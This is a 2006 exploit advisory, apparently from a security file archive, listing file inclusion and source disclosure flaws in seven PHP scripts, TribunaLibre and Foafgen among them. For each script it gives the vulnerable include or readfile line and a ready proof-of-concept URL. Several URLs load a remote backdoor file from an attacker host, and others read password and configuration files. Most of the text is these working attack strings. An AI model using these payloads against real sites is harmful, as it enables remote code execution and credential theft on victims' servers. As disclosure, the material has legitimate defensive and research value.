phpIncludes.txt

phpIncludes.txt: Posted Oct 12, 2006; Authored by DarkFig | Site acid-root.new.fr; TribunaLibre version 3.12 Beta, registroTL, compteur_v2, eboli, Jasmine-Web, and Foafgen version 0.3, and Album Photo Sans Nom version 1.6 all suffer from file inclusion and/or source disclosure flaws.; tags | exploit, web, file inclusion; SHA-256 | fb44f6368003084800507368239e17992af982ee426f8b3a2c2c562f28e1b07e; Download | Favorite | View

phpIncludes.txt

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: TribunaLibre v3.12 Beta
# Download....: http://www.phplibre.com.es/downloads/TribunaLibre_v3.12_Beta.zip
# Poc.........: http://victim.com/ftag.php?mostrar=http://backdoor.txt?
# Vuln.code...: Line 106, <? include($_GET['mostrar']); ?>


# Affected.scr: registroTL
# Download....: http://www.phplibre.com.es/downloads/registroTL.zip
# Poc.........: http://victim.com/main.php?page=ftp://hack.com/backdrphpext
#               http://victim.com/usuarios.dat <- Passwords disclosure
# Vuln.code...: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
#               include($_GET['page'].".php");


# Affected.scr: compteur_v2
# Download....: http://zebigbrozer.free.fr/compt_new/compteur_v2.zip
# Poc.........: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?
# Vuln.code...: Line 9 , include($_GET["folder"]."param.php")


# Affected.scr: eboli
# Download....: http://www.jhjgubbels.nl/eboli/eboli.tar.gz
# Poc.........: http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&content
# Vuln.code...: Line 45, if(isset($_GET['contentSpecial']) && isset($_GET['content'])){
#                        include($_GET['contentSpecial']);


# Affected.scr: Jasmine-Web
# Download....: http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2
# Poc.........: http://victim.pl/index.php?section=ftp://hack.com/backdrphpext
# Vuln.code...: if (isset($_GET['section']) && file_exists($_GET['section'].".php")){
#               include_once($_GET['section'].".php");


# Affected.scr: Foafgen v0.3
# Download....: http://www.toxi.co.uk/foafgen/foafgen_v0.3.0.zip
# Poc.........: http://victim.com/redir.php?foaf=file.php
# Vuln.code...: Line 4, readfile($_GET['foaf']);


# Affected.scr: Album Photo Sans Nom v1.6
# Download....: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
# Poc.........: http://victim.pl/getimg.php?img=config.inc.php
# Vuln.code...: Line 47, readfile($_GET['img']);

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

phpIncludes.txt

phpIncludes.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpIncludes.txt

Share This

phpIncludes.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems